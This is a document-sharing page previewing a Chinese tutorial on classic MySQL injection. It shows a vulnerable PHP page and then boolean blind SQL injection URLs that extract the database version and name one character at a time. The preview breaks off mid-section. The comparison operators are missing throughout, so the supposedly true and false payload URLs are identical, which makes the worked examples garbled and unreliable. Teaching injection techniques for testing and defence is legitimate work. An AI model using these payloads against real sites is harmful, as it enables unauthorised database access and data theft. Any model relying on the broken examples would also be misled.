Mysql经典注射.docVIP

下载本文档

3
0
约5.44千字
约 9页
2019-02-19 发布于浙江
举报
版权申诉

Mysql经典注射.doc

1、原创力文档（book118）网站文档一经付费（服务费），不意味着购买了该文档的版权，仅供个人/单位学习、研究之用，不得用于商业用途，未经授权，严禁复制、发行、汇编、翻译或者网络传播等，侵权必究。。
2、本站所有内容均由合作方或网友上传，本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺！文档内容仅供研究参考，付费前请自行鉴别。如您付费，意味着您自己接受本站规则且自行承担风险，本站不退款、不进行额外附加服务；查看《如何避免下载的几个坑》。如果您已付费下载过本站文档，您可以点击这里二次下载。
3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等，请点击“版权申诉”（推荐），也可以打举报电话：400-050-0827(电话支持时间：9:00-18:30)。
4、该文档为VIP文档，如果想要下载，成为VIP会员后，下载免费。
5、成为VIP后，下载本文档将扣除1次下载权益。下载后，不支持退款、换文档。如有疑问请联系我们。
6、成为VIP后，您将拥有八大权益，权益包括：VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
7、VIP文档为合作方或网友上传，每下载1次，网站将根据用户上传文档的质量评分、类型等，对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档

Mysql 经典注射前言： mysql 4.0 之前的版本不支持 union 语句，所以 mysql 4.0 之前的版本的注射和其他版本的Mysql 注射有很大的区别。Mysql 4.0 及其之后的版本的注射大多数是利用union 联合查询来实现的，这种方法速度快，经典注射的方法在4.0 及其版本的 mysql也是可行的，但由于其方法复杂而不推荐使用。实现：当然首先要有一个注入点。发现内网 HYPERLINK special_view.php 存在注入漏洞。源代码如下: ?php require conn/conn.php; $result=mysql_query(select * from special where id=.$id); if($row=mysql_fetch_array($result)) { $id=$row[id]; $title=$row[title]; $date=$row[date]; $content=$row[content]; Id 没有过滤。因此 HYPERLINK /special_view.php?id=16 /special_view.php?id=16 [sql injection statement] 即可实现注入。 1．猜解版本查询 mysql 版本的sql语句： SELECT version(); 我们可以构造以下的url 进行猜解： HYPERLINK /special_view.php?id=16%20and%20ascii(mid(version(),1,1))96 /special_view.php?id=16%20and%20ascii(mid(version(),1,1))96 上面的url 是猜版本号的第一位，我们用浏览器打开它时，myql 数据库中执行了下面语句： select * from special where id=16 and ascii(mid(version(),1,1))96 我们知道 mysql 的版本号的第一位是3，3的ascii 码是51 因此上面的语句为假，没有查询到任何结果。浏览器打开该url的结果如下：而 HYPERLINK /special_view.php?id=16%20and%20ascii(mid(version(),1,1))96 /special_view.php?id=16%20and%20ascii(mid(version(),1,1))96 就不同了，在 mysql数据库中执行下面的语句： select * from special where id=16 and ascii(mid(version(),1,1))96 因为3 的ascii 码小于96所有上面的语句为真，执行的结果如下。因此浏览器就返回了正确的页面。同理，我们就可以猜解版本号的第2位，第3位。。。 HYPERLINK /special_view.php?id=16%20and%20ascii(mid(version(),2,1))96 /special_view.php?id=16%20and%20ascii(mid(version(),2,1))96 。。。 2. 猜解数据库名：查询数据库名是sql 语句： SELECT database() 在浏览器中打开 HYPERLINK /special_view.php?id=16%20and%20ascii(mid(database(),1,1))96 /special_view.php?id=16%20and%20ascii(mid(database(),1,1))96 也就执行了下面的语句： select * from special where id=16 and ascii(mid(database(),1,1))96 因为i 的accii码 105大于96，所以上面的语句为假，执行后查询不到任何结果。浏览器返回如下：在浏览器中打开 HYPERLINK /special_view.php?id=16%20and%20ascii(mid(database(),1,1))96 /special_view.php?id=16%20and%20ascii(mid(database(),1,1))96 即在mysql 数据库里执行： select * from special where id=16 and ascii(mid(database(),1,1))96 因为i 的accii码 105大于96 , 所以上面的语句为真，myql 数据库执行结果如下：在浏览器中打开结果如下： 3. 猜数据库用户原理和上面猜myql 的版本和数